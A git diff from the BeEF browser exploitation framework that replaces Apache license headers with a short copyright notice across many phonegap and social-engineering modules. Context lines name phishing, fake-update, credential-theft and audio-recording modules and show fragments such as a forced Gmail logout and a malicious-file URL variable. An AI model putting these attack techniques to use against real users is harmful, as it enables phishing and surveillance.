-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js
index 14bdd0406..f9063a5bc 100644
--- a/modules/phonegap/phonegap_list_files/command.js
+++ b/modules/phonegap/phonegap_list_files/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // phonegap_upload
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml
index a4a20c709..8e46172c1 100644
--- a/modules/phonegap/phonegap_list_files/config.yaml
+++ b/modules/phonegap/phonegap_list_files/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb
index 51cff073c..4d2d068a9 100644
--- a/modules/phonegap/phonegap_list_files/module.rb
+++ b/modules/phonegap/phonegap_list_files/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml
index 0d08526ab..0248549c6 100644
--- a/modules/phonegap/phonegap_persist_resume/config.yaml
+++ b/modules/phonegap/phonegap_persist_resume/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 #   persist on over app's sleep/wake events
diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb
index bef0ca663..f324866f7 100644
--- a/modules/phonegap/phonegap_persist_resume/module.rb
+++ b/modules/phonegap/phonegap_persist_resume/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 #   persist on over app's sleep/wake events
diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js
index 7944fa756..60936c0fb 100644
--- a/modules/phonegap/phonegap_persistence/command.js
+++ b/modules/phonegap/phonegap_persistence/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // persistence
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml
index 7d449e7c9..f8f6a3201 100644
--- a/modules/phonegap/phonegap_persistence/config.yaml
+++ b/modules/phonegap/phonegap_persistence/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap persistence
 #
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb
index 30face23d..35c565aeb 100644
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap persistenece
 #
diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js
index 503fc606d..35619852c 100644
--- a/modules/phonegap/phonegap_start_record_audio/command.js
+++ b/modules/phonegap/phonegap_start_record_audio/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // exploit phonegap
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml
index 28e228adc..498874ada 100644
--- a/modules/phonegap/phonegap_start_record_audio/config.yaml
+++ b/modules/phonegap/phonegap_start_record_audio/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb
index 1a24663cb..7e8f6ebe3 100644
--- a/modules/phonegap/phonegap_start_record_audio/module.rb
+++ b/modules/phonegap/phonegap_start_record_audio/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js
index 0463a023c..72dd96b18 100644
--- a/modules/phonegap/phonegap_stop_record_audio/command.js
+++ b/modules/phonegap/phonegap_stop_record_audio/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // exploit phonegap
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml
index 5737fa722..2a78f4779 100644
--- a/modules/phonegap/phonegap_stop_record_audio/config.yaml
+++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb
index f1022c7f2..974b18bdf 100644
--- a/modules/phonegap/phonegap_stop_record_audio/module.rb
+++ b/modules/phonegap/phonegap_stop_record_audio/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js
index eadc1d0f8..bc08ef166 100755
--- a/modules/social_engineering/clippy/command.js
+++ b/modules/social_engineering/clippy/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   
 /**
diff --git a/modules/social_engineering/clippy/config.yaml b/modules/social_engineering/clippy/config.yaml
index 12cf0ecfa..4f373c4c0 100755
--- a/modules/social_engineering/clippy/config.yaml
+++ b/modules/social_engineering/clippy/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/clippy/module.rb b/modules/social_engineering/clippy/module.rb
index 1f519bb74..cc410b7c3 100755
--- a/modules/social_engineering/clippy/module.rb
+++ b/modules/social_engineering/clippy/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Clippy < BeEF::Core::Command
   
diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index 92b0529d7..632544f16 100644
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   
   	// Grab image and payload from config
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index 084807c2a..8d2ca0b50 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index 59b4cbd0f..88750a8b9 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Fake_flash_update < BeEF::Core::Command
   
diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js
index 0926bd59d..2deb32a14 100644
--- a/modules/social_engineering/gmail_phishing/command.js
+++ b/modules/social_engineering/gmail_phishing/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 function logoutGoogle() {
 	var img = document.createElement("IMG");
 	img.src = "https://mail.google.com/mail/?logout";
diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml
index a7666f4b3..6fdb19c82 100644
--- a/modules/social_engineering/gmail_phishing/config.yaml
+++ b/modules/social_engineering/gmail_phishing/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb
index dc12c3a33..a31c93f1f 100644
--- a/modules/social_engineering/gmail_phishing/module.rb
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Gmail_phishing < BeEF::Core::Command
 
diff --git a/modules/social_engineering/lcamtuf_download/command.js b/modules/social_engineering/lcamtuf_download/command.js
index 2982cd00b..599b5f8d9 100644
--- a/modules/social_engineering/lcamtuf_download/command.js
+++ b/modules/social_engineering/lcamtuf_download/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {	
 	var maliciousurl = '<%= @malicious_file_uri %>';
 	var realurl = '<%= @real_file_uri %>';	
diff --git a/modules/social_engineering/lcamtuf_download/config.yaml b/modules/social_engineering/lcamtuf_download/config.yaml
index e081ec991..08cc18538 100644
--- a/modules/social_engineering/lcamtuf_download/config.yaml
+++ b/modules/social_engineering/lcamtuf_download/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb
index 7d163b78c..709c25ae3 100644
--- a/modules/social_engineering/lcamtuf_download/module.rb
+++ b/modules/social_engineering/lcamtuf_download/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Lcamtuf_download < BeEF::Core::Command
   
diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index 911ffd801..d82e00142 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   
 	imgr = "<%== @imgsauce %>";
diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml
index 2540ced00..d70ebbf26 100644
--- a/modules/social_engineering/pretty_theft/config.yaml
+++ b/modules/social_engineering/pretty_theft/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index 437f59819..3e0ae3579 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Pretty_theft < BeEF::Core::Command
   
diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
index e924ebb41..2563e4a48 100644
--- a/modules/social_engineering/simple_hijacker/command.js
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
